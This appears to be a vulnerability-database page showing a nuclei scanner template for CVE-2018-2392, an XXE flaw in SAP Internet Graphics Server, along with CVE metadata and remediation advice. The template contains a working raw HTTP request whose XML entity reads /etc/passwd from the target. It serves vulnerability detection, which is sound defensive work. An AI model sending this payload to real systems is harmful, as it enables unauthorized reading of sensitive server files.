Lucene search
K

SAP Internet Graphics Server (IGS) - XML External Entity Injection

🗓️ 18 Jun 2026 03:02:43Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 81 Views

SAP IGS - XML External Entity Injection, CVE-2018-2392, CVSS 7.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2018-2392
14 Feb 201800:00
attackerkb
ATTACKERKB
CVE-2018-2393
14 Feb 201800:00
attackerkb
Circl
CVE-2018-2392
7 Oct 202016:19
circl
Circl
CVE-2018-2393
7 Oct 202016:19
circl
CVE
CVE-2018-2392
14 Feb 201812:00
cve
CVE
CVE-2018-2393
14 Feb 201812:00
cve
Cvelist
CVE-2018-2392
14 Feb 201812:00
cvelist
Cvelist
CVE-2018-2393
14 Feb 201812:00
cvelist
Metasploit
SAP Internet Graphics Server (IGS) XMLCHART XXE
7 Oct 202017:41
metasploit
NVD
CVE-2018-2392
14 Feb 201812:29
nvd
Rows per page
id: CVE-2018-2392

info:
  name: SAP Internet Graphics Server (IGS) - XML External Entity Injection
  author: _generic_human_
  severity: high
  description: |
    SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XML external entity injection (XXE) vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or a complete system compromise.
  remediation: |
    Apply the latest security patches and updates provided by SAP to mitigate this vulnerability. Additionally, ensure that the SAP Internet Graphics Server (IGS) is not exposed to untrusted networks or the internet.
  reference:
    - https://launchpad.support.sap.com/#/notes/2525222
    - https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/
    - https://www.rapid7.com/db/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe/
    - https://troopers.de/troopers18/agenda/3r38lr/
    - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb
    - https://nvd.nist.gov/vuln/detail/CVE-2018-2392
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2018-2392
    cwe-id: CWE-611
    epss-score: 0.40591
    epss-percentile: 0.98471
    cpe: cpe:2.3:a:sap:internet_graphics_server:7.20:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sap
    product: internet_graphics_server
  tags: cve,cve2018,sap,igs,xxe,xmlchart,msf,intrusive,vkev,vuln

http:
  - raw:
      - |
        POST /XMLCHART HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary={{randstr_1}}

        --{{randstr_1}}
        Content-Disposition: form-data; name="{{randstr_2}}"; filename="{{randstr_3}}.xml"
        Content-Type: application/xml

        <?xml version='1.0' encoding='UTF-8'?>
            <ChartData>
              <Categories>
                <Category>ALttP</Category>
              </Categories>
              <Series label="{{randstr_4}}">
                <Point>
                  <Value type="y">12345</Value>
                </Point>
              </Series>
            </ChartData>
        --{{randstr_1}}
        Content-Disposition: form-data; name="{{randstr_5}}"; filename="{{randstr_6}}.xml"
        Content-Type: application/xml

        <?xml version='1.0' encoding='UTF-8'?>
            <!DOCTYPE Extension [<!ENTITY xxe SYSTEM "/etc/passwd">]>
            <SAPChartCustomizing version="1.1">
              <Elements>
                <ChartElements>
                  <Title>
                    <Extension>&xxe;</Extension>
                  </Title>
                </ChartElements>
              </Elements>
            </SAPChartCustomizing>
        --{{randstr_1}}--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - Picture
          - Info
          - /output/
        condition: and

      - type: word
        part: body
        words:
          - ImageMap
          - Errors
        condition: or

      - type: word
        part: header
        words:
          - text/html
          - SAP Internet Graphics Server
        condition: and

      - type: status
        status:
          - 200

# file name - /etc/passwd
# digest: 4b0a0048304602210098778ad7d70d503c85565043e3e2bb3770cdd5487be516165ec36f078ab651cc02210080b9cbb35df6b95faddbd9476c8ca1fc978cecbd6a6964489b1dd1b163a6d203:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 25
CVSS 37.5
EPSS0.40591
81